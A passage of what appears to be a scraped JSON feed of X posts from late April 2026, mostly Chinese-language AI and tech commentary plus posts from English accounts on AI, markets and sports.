客户场景是老小区-1楼一个房间里,拉了8条商务专线+1条商务专线带的二宽。\n那么,这个地方是否有问题呢?我认为是没问题的。因为", "url": "https://x.com/realNyarime/status/2049408651660755063"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T08:40:25+00:00", "title": "R to @GoSailGlobal: 3️⃣ 可以把做的张小龙Agent拉到群组\n\n大家可以圆桌讨论,简单易用", "url": "https://x.com/GoSailGlobal/status/2049408452079046944"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T08:40:22+00:00", "title": "R to @GoSailGlobal: 2️⃣ 每个agent可以GUI自定义大模型、skill、memory\n\n还可以支持第三方模型", "url": "https://x.com/GoSailGlobal/status/2049408436597899361"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T08:40:18+00:00", "title": "R to @GoSailGlobal: 1️⃣ 使用google邮箱登陆\n\n可下载本地软件(最好下载本地) or 网页版使用", "url": "https://x.com/GoSailGlobal/status/2049408421167005763"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T08:40:14+00:00", "title": "被一个二维码拉进了一个 IM 内测群\n\n群里坐着 Codex / Claude Code 实例、张小龙 agent,再加几个真人,大家一起讨论选题\n\nagent 先梳调性,再列大纲,真人在旁边补刀\n\n我做 AgentSkillsHub 看了 67,000+ 个 agent 项目,第一次见有人把 agent 当 IM 里的「一等公民」:不是 bot、不是插件,是好友名单里的成员\n\n它叫 Bloome(http://www.bloome.im),前 Kimi 核心 PM 做的\n\n现在秘密内测中,大家都在看 agent network 该长什么样:一群人,一群", "url": "https://x.com/GoSailGlobal/status/2049408403240571320"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-29T08:20:26+00:00", "title": "兄弟们,搞3D的直接冲🤩🤩🤩\n\nClaude上线了Blender MCP连接器,\n自然语言直接操控Blender的Python API,\n调场景、批量改物体、写自定义工具,不用会一行代码,\n\n我之前在Blender写个批量脚本至少折腾半小时,\n现在一句话就搞定了,\n\n更狠的是Anthropic同时砸钱加入了Blender基金会当赞助商,\n这波是总共9个创意工具连接器一起上线", "url": "https://x.com/Pluvio9yte/status/2049403423813140571"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-29T08:16:00+00:00", "title": "刚学习完罗福莉老师这场 3.5h 访谈发了中文解读,\n转头就刷到她团队在送 100T tokens grant,立马提交申请。\n\n表单做得对中文 builder 极友好:\n工具栏 OpenClaw / Claude Code / Codex 排前三\n模型可勾 Claude / MiMo / DeepSeek / 豆包 / MiniMax 等国产\n\n下一步:把 MiMo V2.5 接进现有 Claude Code 工作流,\n做横向对照实测出公开内容。(如果申请成功的话😆)\n\n听 → 写 → 用 → 传播,一个闭环。\n\n申请入口:http://100t.xi", "url": "https://x.com/runes_leo/status/2049402305217241384"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T07:55:14+00:00", "title": "Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!", "url": "https://x.com/CuiMao/status/2049397079177592925"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T07:44:33+00:00", "title": "x.com/i/article/204921670329…", "url": "https://x.com/CuiMao/status/2049394392776290573"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T07:15:58+00:00", "title": "裤袜是裤子还是袜子?", "url": "https://x.com/realNyarime/status/2049387196311105556"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T07:09:24+00:00", "title": "😄", "url": "https://x.com/CuiMao/status/2049385544577438121"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T07:02:18+00:00", "title": "哈哈。主页刷到很多小朋友拿到了字节的 offer ,恭喜啊,我当时进字节的第一天,乌云遮天,大雨滂沱,电闪雷鸣,预示着一个伟大的产品经理即将孕育而生。😎😎,加油!,每天都是 Day 1", "url": "https://x.com/CuiMao/status/2049383757535490257"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-29T06:32:45+00:00", "title": "看别人天天发商单,还特么疯狂涨粉。\n\n难受了☹️ \n\n是时候,我也要让甲方爸爸来几个单了!\n\n助我一臂之力了嘿嘿😁\n\n在线等啊…", "url": "https://x.com/berryxia/status/2049376324444410138"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T06:19:31+00:00", "title": "Cybertruck", "url": "https://x.com/elonmusk/status/2049372990870290940"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-29T06:15:09+00:00", "title": "x.com/i/article/204902031072…", "url": "https://x.com/runes_leo/status/2049371895267774715"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T06:05:35+00:00", "title": "Congrats!", "url": "https://x.com/elonmusk/status/2049369485459832951"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T06:04:54+00:00", "title": "呵呵,上个月我说雷总的模型会把价格打下来,一群人喷我懂个 p 的 AI ,今天满屏都是感谢雷总,天地良心,成年人的世界真的他妈的太现实了吧。", "url": "https://x.com/CuiMao/status/2049369313547800804"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T06:04:42+00:00", "title": "RT by @elonmusk: Full circle moment: paying for @Starlink with @XMoney 🤝", "url": "https://x.com/elonmusk/status/2049369264914903143"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T06:02:06+00:00", "title": "用 GPT Image 2 赚钱,你想到几种方式?\n\n我整理了5种,每种都有提示词,拿走能用\n\n但还有一种方式不用自己会出图也能赚!!\n\n有人进货四分钱,卖两毛,自己一张图都不出\n\n闲鱼上已经有人在跑了\n\n其余 5 种看图\n\n完整提示词加自动化流程,请看引用文章👇", "url": "https://x.com/lxfater/status/2049368609193926810"}, {"handle": "naval", "name": "Naval Ravikant", "published_at": "2026-04-29T06:01:47+00:00", "title": "\"Savings Tax.\"", "url": "https://x.com/naval/status/2049368528445403351"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T05:57:10+00:00", "title": "RT by @elonmusk: Elon Musk on AI during the OpenAI trial:\n\n\"It (AI) could make us more prosperous, but it could also kill us all. We want to be in a Gene Roddenberry movie, like Star Trek, not so much a James Cameron movie, like Terminator.\n\nHe then elaborated by comparing AI tra", "url": "https://x.com/elonmusk/status/2049367366824305013"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T05:32:52+00:00", "title": "拼接两段 15s的忠犬八公动漫视频\n\n很不错哈", "url": "https://x.com/GoSailGlobal/status/2049361252804427850"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-29T04:57:00+00:00", "title": "OpenAI may no longer be a nonprofit but it continues to be—and may always be—a “never made a profit”", "url": "https://x.com/GaryMarcus/status/2049352224547975422"}, {"handle": "chuxiaeth", "name": "初夏", "published_at": "2026-04-29T04:52:50+00:00", "title": "🧵 最近主攻各平台的嘴撸创作者赛道,不卷且能稳定产出收益。这波参与的是 @MindoAI 和 @useTria 的联合活动 🎯\n\n策略上我依然聚焦推文创作,辅以低磨损的轻交互。活动需要交易量和办卡,门槛确实比纯内容局高,但我不会去死磕资金堆量的维度,找准自己优势位最重要 📊\n\nTria交互链接:http://app.tria.so/?accessCode=3RPJYP7003&utm_source=mindo\n\n排名规则分三块:\n1️⃣ DEX 交易量\n2️⃣ 信用卡办理加消费\n3️⃣ 创作者影响力\n我的打法是主攻第三项,前两项用最小成本蹭基础分,集中火", "url": "https://x.com/chuxiaeth/status/2049351176433623539"}, {"handle": "naval", "name": "Naval Ravikant", "published_at": "2026-04-29T04:45:11+00:00", "title": "R to @naval: Apple: http://apple.co/4cF5VWZ\n\nSpotify: http://open.spotify.com/episode/5C1aTaJwlpkGC7Lj0cqDrx\n\nYouTube: http://youtu.be/hTdSU7q5WCo\n\nTranscript: http://nav.al/code\n\n—\n\nPresented by AngelList: http://angellist.com/podcast", "url": "https://x.com/naval/status/2049349252112089553"}, {"handle": "naval", "name": "Naval Ravikant", "published_at": "2026-04-29T04:45:10+00:00", "title": "New podcast on vibe coding - A Return to Code.\n\nA Return to Coding 00:20\n\nThe Personal App Store 03:17\n\nVibe Coding Is a Video Game with Real-World Rewards 06:22\n\nPure Software Is Uninvestable 10:33\n\nA Place for Each Model 14:22\n\nAI Is Eager to Please 17:57\n\nWhy Math and Coding? ", "url": "https://x.com/naval/status/2049349249905951175"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-29T04:39:21+00:00", "title": "未来属于设计 测评 和 运营", "url": "https://x.com/Pluvio9yte/status/2049347785456316549"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T04:07:44+00:00", "title": "Matt Pocock 的 Skill 框架 · 跟其他三家的差异\n\n项目链接:http://github.com/mattpocock/skills · 38K stars · MIT · 单人维护、日活更新\n\n一句话:把资深工程师的纪律装进 Claude Code,让 vibe coder 也能写出能上线的代码。\n\n含 16 个 skill:tdd / diagnose / improve-codebase-architecture / to-prd / to-issues / triage / grill-me / zoom-out / git-g", "url": "https://x.com/GoSailGlobal/status/2049339826877665496"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T03:53:48+00:00", "title": "x.com/i/article/204933030407…", "url": "https://x.com/GoSailGlobal/status/2049336319286063302"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-04-29T03:49:14+00:00", "title": "我就知道🤣🤣🤣", "url": "https://x.com/dingyi/status/2049335171066061234"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-29T03:42:31+00:00", "title": "RT by @paulg: MIT student asked a question earlier today that a lot of young founders are quietly wondering about:\n\n\"Won’t the frontier labs just do everything?\"\n\nYes it's true that OAI/Ant are shipping at incredible pace, but it's quite easy to avoid their blast radius and build", "url": "https://x.com/paulg/status/2049333482271260710"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T03:37:16+00:00", "title": "RT by @elonmusk: The exact same question to Grok 4.3, GPT 5.5, and Claude Opus 4.7:\n\n“Count to 10 starting from 11”\n\nGrok 4.3 wins 🏆\nEvery single time\n\nIt gave 11, 10 and explained why going backwards was the only logical move... The others started counting from 11 to 20\n\nGrok’s ", "url": "https://x.com/elonmusk/status/2049332159601942995"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-29T03:29:10+00:00", "title": "RT by @paulg: What do the smartest kids in the world do when they grow up?\n\nI did the largest study of ~18,000 International Olympiad medalists (IMO, IOI and IPhO) over the last 25yrs, arguably the sharpest analytical minds of the world in high school, to see where they ended up ", "url": "https://x.com/paulg/status/2049330123464393084"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T03:28:30+00:00", "title": "R to @lxfater: 海报图片提示词 :\n\n请生成一张随机的瑜伽宣传海报拼贴总图。\n整体要求:\n在一张大画面中,随机分隔出 N 张彼此独立的瑜伽宣传海报\n每张卡面尺寸随机设计铺满整张图\n卡面之间用清晰的留白、细边框、拼贴切割线或杂志式分隔结构隔开\n整体像一次抽出了 N 张不同风格的高质量瑜伽宣传海报\n每张海报都要明显不同,具有\"随机抽卡\"的新鲜感和丰富变化\n所有海报统一保持高级、专业、吸引人,适合瑜伽课程宣传、社媒推广、品牌视觉展示\n\n分镜摆姿势提示词:将图一的女性改为图二的4,5姿势,生成图片\n\n视频提示词:根据首尾帧生成丝滑的,就是专业瑜伽演", "url": "https://x.com/lxfater/status/2049329956153352499"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T03:28:29+00:00", "title": "R to @lxfater: 如何使用Agent 模式 3 步:\n\n选图像模式\n选GPT-2-image\n点 Agent 按钮\n\n利用下面给的提示词,出了分镜图和人设图\n\n接下来,利用分镜图和人设图,我们就可以控制人物动作啦!!\n\n如何做到呢?主要思路就是让摆出开始的瑜伽动作和结束的瑜伽动作(具体如图一所示)\n\n得出首帧和尾帧,直接喂给可灵视频模型,就出上面的视频了\n\n多个视频就可以出系列的瑜伽动作\n\nflowith的高级套餐包含 GPT Image 2 和 Nanobanana 2 flash 无限生成\n需要的可以使用下面链接,注册送积分:https:", "url": "https://x.com/lxfater/status/2049329950495310198"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T03:28:28+00:00", "title": "做内容运营,生图生视频,你现在还在跑好几个工具吗?\n\n被朋友拉去做瑜伽图,搭了无数工作流\nGPT Image 2 出来后,发现全废了\n\n得重新规划一套,但这几天身体不舒服,没心思搞\n随手把提示词扔进 flowith 试了一下\n\n以为偷懒的结果会很烂,但实际上这个是我最近用的最好的生图agent之一。\n\n它直接出了 12 个瑜伽动作分镜,动作清晰,描述完整\n\n分镜图和人物图来生成出首末两张图片,用视频模式可灵模型,简单的演示视频,一条链路打通,全在一个工具里面\n\nAgent 模式还能联网,生成下周海报日历,日期星期都是对的,普通的生图模型记忆估计2025年", "url": "https://x.com/lxfater/status/2049329944052859141"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T03:20:42+00:00", "title": "4/29 AI 圈速览\n\n• OpenAI 全系正式登陆 AWS:GPT + Codex + 托管 Agent 一并上线\n\n• Anthropic 拒接军方合作,Google 顺势签下五角大楼新合同\n\n• Claude Code 系统提示 Bug:托管 Agent 失效 + 用户 token 被空转烧光\n\n• mattpocock 开源个人 .claude Skills 目录:工程师级实战合集\n\n• Composio 发布 awesome-codex-skills:Codex 跨平台自动化即插即用\n\n• Lovable Vibe Coding 上线 iO", "url": "https://x.com/GoSailGlobal/status/2049327989951967546"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T03:20:09+00:00", "title": "🔥 今日新鲜 Skills 精选 Top 10(4月29日)\n由 http://agentskillshub.top 整理!发现 67000+ AI Agent 工具,每日更新 🚀\n\nMozilla 出手做统一 LLM 接口 + 跨领域 MCP 扩张,今日生态边界被拓得最宽!!!\n\n1️⃣ mozilla-ai/any-llm\n⭐ 1928 | +1928\nMozilla AI 出品——一个接口跟所有 LLM provider 通信,挑战 LiteLLM\n🔗 https://github.com/mozilla-ai/any-llm\n🌐 https://", "url": "https://x.com/GoSailGlobal/status/2049327853469310984"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-29T03:10:50+00:00", "title": "RT by @GaryMarcus: Gary, that was a great article. Wonderful work as always sir. You have been proven accurate once again.", "url": "https://x.com/GaryMarcus/status/2049325506764677608"}, {"handle": "gkxspace", "name": "余温", "published_at": "2026-04-29T03:09:17+00:00", "title": "有做 摄影行业 的朋友吗,有个项目想聊一聊😊", "url": "https://x.com/gkxspace/status/2049325117998592311"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T02:54:33+00:00", "title": "RT by @realNyarime: 基于大家的评论,看来大家都想要 token,所以这次我打算这样庆祝。\n\n关注我 @aiandcloud 并转发 + 评论这条内容,5 月 8 日开奖, 送 $100 GPT-5.5 API token,有效期两个月。\n如果活动期间到了 2K fo,就再加一个 $200 的名额,万一到 3K 就加个 $300 的也行!\n\n感谢大家的支持!🥰", "url": "https://x.com/realNyarime/status/2049321411420811479"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-29T02:53:39+00:00", "title": "the ability of this man to sell things he doesn’t believe in is truly extraordinary", "url": "https://x.com/GaryMarcus/status/2049321182089081059"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T02:39:00+00:00", "title": "好消息:沪爷可以去金马了\n坏消息:需要到福建的出入境办大通证(往来台湾通行证)和签注", "url": "https://x.com/realNyarime/status/2049317496361292240"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-29T02:31:21+00:00", "title": "R to @sama: at this point @ajambrosino is mogmogging\n\nenjoy the next few updates", "url": "https://x.com/sama/status/2049315574120055054"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-29T02:27:13+00:00", "title": "Image", "url": "https://x.com/sama/status/2049314532892475791"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-29T02:16:00+00:00", "title": "群里讨论开源 bot,多数人共识就一句话:赚钱的 bot 没人会开源。\n\n听着像废话,但这个常识在 AI 时代变得尖锐——\n\n以前护城河是\"代码会写\"。现在 github 丢给 AI,几秒钟读完整个架构。重写成本从两个月变成两小时。\n\n护城河从\"代码会写\"变成\"策略会想\"。\n\n这件事我自己也在分层做——\n\npolymarket-toolkit 我开源(仓库https://github.com/runesleo/polymarket-toolkit),它解决的是数据采集、API 调用这类工具层的事。复用价值大,门槛低,开源等于做品牌。\n\nH 系列做市/ta", "url": "https://x.com/runes_leo/status/2049311708330459226"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T01:58:03+00:00", "title": "说个冷知识\n\n云服务厂商还是很有投资眼光的\n\n原价或者加价买了H100,现在还能卖那个价,甚至更高\n\n另外他还能出租5年保修期内的机器\n\n这不妥妥当下最具价值的投资品类嘛", "url": "https://x.com/GoSailGlobal/status/2049307192692781200"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-29T01:56:48+00:00", "title": "R to @charliebilello: x.com/charliebilello/status/…", "url": "https://x.com/charliebilello/status/2049306875301130507"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T01:55:58+00:00", "title": "RT by @elonmusk: #BREAKING: Chairman @Jim_Jordan invites Southern Poverty Law Center Interim CEO and President Bryan Fair to testify publicly on Wednesday, May 20, 2026, at 10:00 a.m.", "url": "https://x.com/elonmusk/status/2049306669352358192"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-29T01:55:13+00:00", "title": "US home prices increased 0.7% over the last year, the slowest growth rate since June 2023. There are currently a record 46% more sellers than buyers nationally. Absent manipulation from the Federal Government/Reserve, prices will come down and homes will become more affordable.", "url": "https://x.com/charliebilello/status/2049306480071873011"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-04-29T01:47:21+00:00", "title": "Ghostty 离开 GitHub,同一天 Warp 宣布开源。\n\nWarp 一直以来都很好用,但越来越臃肿,性能也差点意思,但对不会命令行的非程序员非常友好,这次开源可以说是一个重大转折点,没准半年后各种 Warp 变体都会出现了。\n\n还有,Warp 现在的垂直 tab 就比基于 Ghostty 的那些 Cmux 好用多了,期待未来出现更多好用的终端!", "url": "https://x.com/dingyi/status/2049304499093946475"}, {"handle": "gkxspace", "name": "余温", "published_at": "2026-04-29T01:38:07+00:00", "title": "R to @gkxspace: 大家的重点不应该放在“六个月”、“不需要人”\n\n技术的迭代速度很快,现在可以10个人变成5个,或许六个月、也或许一年后可能变成1个,直到完全不需要人来做各种重复性工作\n\n更应该关注的是找到自身的价值,在这波AI浪潮里有属于自己的独特性", "url": "https://x.com/gkxspace/status/2049302176900501544"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-29T01:24:00+00:00", "title": "\"SBC becomes a problem when stock prices fall and dilution explodes.\n\nWhat was 3% annual dilution can quickly become 10%, creating a downward spiral that is hard to escape.\n\nThe fix is to be far more selective, give equity to the top performers who drive value, and pay the rest i", "url": "https://x.com/HarryStebbings/status/2049298621951058341"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-29T01:23:28+00:00", "title": "Since the start of the Iran war...\nJet Fuel: +70%\nSulfur: +60%\nBrent Crude Oil: +52%\nHeating Oil: +52%\nWTI Crude Oil: +48%\nUrea: +48%\nDiesel: +45%\nGasoline: +40%\nEuropean Nat Gas: +36%\nFertilizer: +23%\nPalm Oil: +12%\nCoal: +11%\nWheat: +10%\nIron Ore: +8%\nS&P 500: +4%\n$VIX: -10%", "url": "https://x.com/charliebilello/status/2049298490489004357"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T01:22:14+00:00", "title": "RT by @GoSailGlobal: 我和张凯的GEO论文,在全球最大的论文平台http://arxiv.org完成审核并正式发布\n这应该是全球第二篇与GEO有关的专项论文\n\n论文基于今年3月份最新的数据,包括602条 Prompt、21143 条引用、23745条AI抓取记录,最终形成的一版正式的GEO专项研究报告,欢迎查阅\n\n如果对大家能有帮助,我们打算后面继续抓取更多的数据,进行专项研究并开放研究成果\n\n网页地址:https://arxiv.org/abs/2604.25707\n论文PDF:https://arxiv.org/pdf/2604.", "url": "https://x.com/GoSailGlobal/status/2049298176935690588"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-29T01:17:10+00:00", "title": "搭配收集免费模型的开源项目 使用这篇文章更佳\n\nhttps://github.com/cheahjs/free-llm-api-resources", "url": "https://x.com/Pluvio9yte/status/2049296905382035945"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T01:16:51+00:00", "title": "RT by @elonmusk: Following future rollout of FSD V14 Lite for HW3 vehicles in the US, we plan on expanding V14 Lite to additional international markets.\n\nThis update ensures that HW3 vehicle owners will continue to benefit from ongoing software updates.\n\nSince international rollo", "url": "https://x.com/elonmusk/status/2049296822162874685"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T01:15:23+00:00", "title": "昨天试着申请了小米百万亿Token补贴,也收到了雷总送的7亿token,有效期一个月\n支持OpenAI和Anthropic端点,也有提供Claude Code等AI软件接入文档,看得出MiMo团队很用心在做这个事情\n\n接下来一个月,我会用MiMo V2.5对接OpenClaw尝试Vibe一个项目并开源,也期待国产LLM越做越好!", "url": "https://x.com/realNyarime/status/2049296454905393361"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-29T01:07:12+00:00", "title": "Big Zesty 💪", "url": "https://x.com/jason/status/2049294394075849059"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-29T01:02:14+00:00", "title": "x.com/i/article/204914647001…", "url": "https://x.com/Pluvio9yte/status/2049293145670836459"}, {"handle": "svwang1", "name": "王川(硅谷)", "published_at": "2026-04-29T00:48:58+00:00", "title": "旧金山湾区的地铁站花了九千万美元在入口处加了高高的门,这样逃票变得非常困难。不仅每年增加了一千万美元收入,而且地铁变得更加干净安全,之前要做的各种清理工作减少了 95%。\n\n和外界交往的过程中,增加各种严格的过滤筛选机制,是保护自己,提高效率的一个重要必备的措施。因为成本的原因而对外不设防,就是准备把自己变成垃圾场。", "url": "https://x.com/svwang1/status/2049289806241550791"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T00:23:52+00:00", "title": "RT by @elonmusk: Ookla says @Starlink has been a game-changer for inflight Wi-Fi speeds. Their new report ranks which airline has the fastest Wi-Fi:\n\n\"Starlink stood out for its speed. Of over 50 airlines evaluated, the eight airlines that exceeded 100 Mbps median download speed ", "url": "https://x.com/elonmusk/status/2049283488600277368"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T00:09:36+00:00", "title": "RT by @elonmusk: Super high bandwidth to commercial aircraft with @Starlink", "url": "https://x.com/elonmusk/status/2049279898976702535"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-29T00:05:58+00:00", "title": "Oh lordy... here comes the lawfare madness again 🤦\n\n86 when I grew up in the restaurant business meant “to get rid of” something (ie “86 clams” meant to take clams off the menu). \n\nI was told it had two origins:\n\n1. 86 Chumley's, which was the address of the speakeasy in Manhatta", "url": "https://x.com/jason/status/2049278984513310783"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T00:05:46+00:00", "title": "看来草莓问题和洗车问题很经典了,ChatGPT都在测试", "url": "https://x.com/lxfater/status/2049278935897186512"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-29T00:05:00+00:00", "title": "\"No, layoffs alone will not fix the problem.\n\nIf a company has become bloated, simply cutting 50% often just leaves you with half the same mediocrity.\n\nThe real issue is culture and talent quality, and fixing that usually requires a full rebuild, which is extremely hard, especial", "url": "https://x.com/HarryStebbings/status/2049278741583643076"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T23:51:30+00:00", "title": "Not investment advice…. but WERE AT A FOUR YEAR HIGH AND WE CRUSHED EARNINGS 😂😂🤦😂😂\n\nNever change Philly!!!", "url": "https://x.com/jason/status/2049275346109796388"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T23:51:17+00:00", "title": "Google Gemma 官方教你本地跑 Coding Agent!\n\n本地完美组合来了:\n• Pi Agent\n• Gemma 4 26B 模型\n• LM Studio / Ollama / llama.cpp 等 serving engine\n\n完全离线运行、零 API 费用、100% 隐私保护、零延迟!本地开发者 Agentic 开发神器!\n\n附 @patloeber 详细一步步搭建教程👇\nhttps://patloeber.com/gemma-4-pi-agent/", "url": "https://x.com/berryxia/status/2049275291164692726"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T23:50:25+00:00", "title": "Lock in, GAME FIVE, @knicks fam!\n\n@BenStiller @jalenbrunson1 @Arifromanhattan \"\">@CPTheFanchise @jerryferrara @MrChuckD\n@RealChalamet @fredwilson @msavino\n@JDSportsTalkNY @nihalmehta @WorldWideWob\n@BillSimmons😂@JesseItzler @ajv 📷 @duglust @ischafer @sirgutz @Traticaster101 \n\nHow", "url": "https://x.com/jason/status/2049275070800150851"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T23:46:25+00:00", "title": "🚀 OpenBMB 重磅发布!MiniCPM-o 4.5 技术报告来了!\n\n9B 参数多模态模型实现突破性实时交互:\n\n• Omni-Flow 框架:原生全双工流式交互(视频+音频+文本毫秒级同步)\n\n• Native Full-Duplex + Proactive Interaction(无需VAD,可主动提醒)\n\n• 多模态基准接近 Gemini 2.5 Flash(MMBench 87.6 / MathVista 80.1)\n\n• 极致 Edge AI:完全离线运行,一键安装 Windows / macOS(12G VRAM 即可)\n\n• 100%", "url": "https://x.com/berryxia/status/2049274065610027362"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-28T23:38:00+00:00", "title": "之前一直没搞清楚 GitHub 通知是怎么工作的。Star / Watch 各档到底推什么?摸清楚才发现很多人(包括我)一直在误解:star 根本不触发通知。\n\n- Star ⭐ = 书签,零通知\n- Watch (All Activity) = issue / PR / release / discussion / commit 评论,但单纯 push 不推\n- Watch (Releases only) = 只有打 tag 发 release 才推\n\n所以 star 在机制层就是个公开的\"值得存一下\"标签,不是订阅、不反映使用、甚至不代表看过。每次 ", "url": "https://x.com/runes_leo/status/2049271946022474215"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-04-28T22:59:18+00:00", "title": "我去有人知道这是哪位大神设计的吗?@FateTell 应该是今年看到的设计最精美又好玩的 iOS app 了 !算命 + AI 结合很有创意,细节打磨的也相当好。哪怕你对八字之前不感兴趣,我也建议下载一个把玩一下。看多了千篇一律 vibe 的产品,突然看到这个真的让人眼前一亮啊。\n\nhttps://fatetell.com/zh-CN/invite?referral=QQE5QT", "url": "https://x.com/dingyi/status/2049262208241332358"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:51:25+00:00", "title": "R to @berryxia: GitHub:https://github.com/harflabs/SwiftVLC\n\n```", "url": "https://x.com/berryxia/status/2049260222863266206"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:51:22+00:00", "title": "这个老哥 写的SwiftVLC 正式开源啦!🔥\n\n现代 Swift 6 对 libVLC 的高质量 wrapper(驱动 Tilfaz 应用):\n\n• 直接 C bindings,无 Objective-C 桥接 \n• 严格并发支持(Strict Concurrency) \n• 专为 SwiftUI 量身打造 \n• 支持 iOS、macOS、tvOS、Mac Catalyst \n\n附带完整 Showcase App(40 个案例)和详细 DocC 文档!", "url": "https://x.com/berryxia/status/2049260211895185445"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:48:37+00:00", "title": "GPT2 真的成精了!的确!\n小小东老哥整的这套提示词很不错,推荐大家!", "url": "https://x.com/berryxia/status/2049259518027276559"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-28T22:48:24+00:00", "title": "RT by @elonmusk: The California Coastal Commission has issued a formal apology to @elonmusk and SpaceX, adding that it will not consider political views or speech in future regulatory decisions.\n\n• The Commission admits some officials made politically biased and improper statemen", "url": "https://x.com/elonmusk/status/2049259466973933764"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:31:31+00:00", "title": "3D 网格生成重磅突破!SATO 来了!\n\n• 从点云(Point Clouds)直接生成完整网格 \n• Strip-based tokenization,实现超干净边缘流与结构 \n• 原生 UV segmentation 直接 baked into 生成过程 \n• 单个模型同时支持三角网格 + 四边形网格", "url": "https://x.com/berryxia/status/2049255217603178794"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T22:28:53+00:00", "title": "If this passes, what impact (if any) do you think @RoKhanna’s $25 minimum wage will have on unemployment rate in California? \n\nShow your work.", "url": "https://x.com/jason/status/2049254554550653047"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:26:54+00:00", "title": "我靠!兄弟们?Warp 都要开源了!\n\n官方宣布Warp 正式全面开源啦!🔥\n\n知名现代终端 + Agentic 开发环境 Warp 现在完全开源!\n\n• 代码、Roadmap、贡献流程全部开放\n• GitHub:https://github.com/warpdotdev/warp\n• Oz AI agents(GPT 驱动)负责 coding、planning、testing\n• OpenAI Devs 担任 founding sponsor\n\n开发者福音!\n欢迎社区一起共建下一代终端工具 🚀", "url": "https://x.com/berryxia/status/2049254052840812960"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-28T22:24:00+00:00", "title": "\"You cannot have only A players in every role, some functions are just there to keep the business running.\n\nBut you can build a team where the people you keep are the highest performers in those roles.\n\nA players thrive when surrounded by other strong performers, but they get dra", "url": 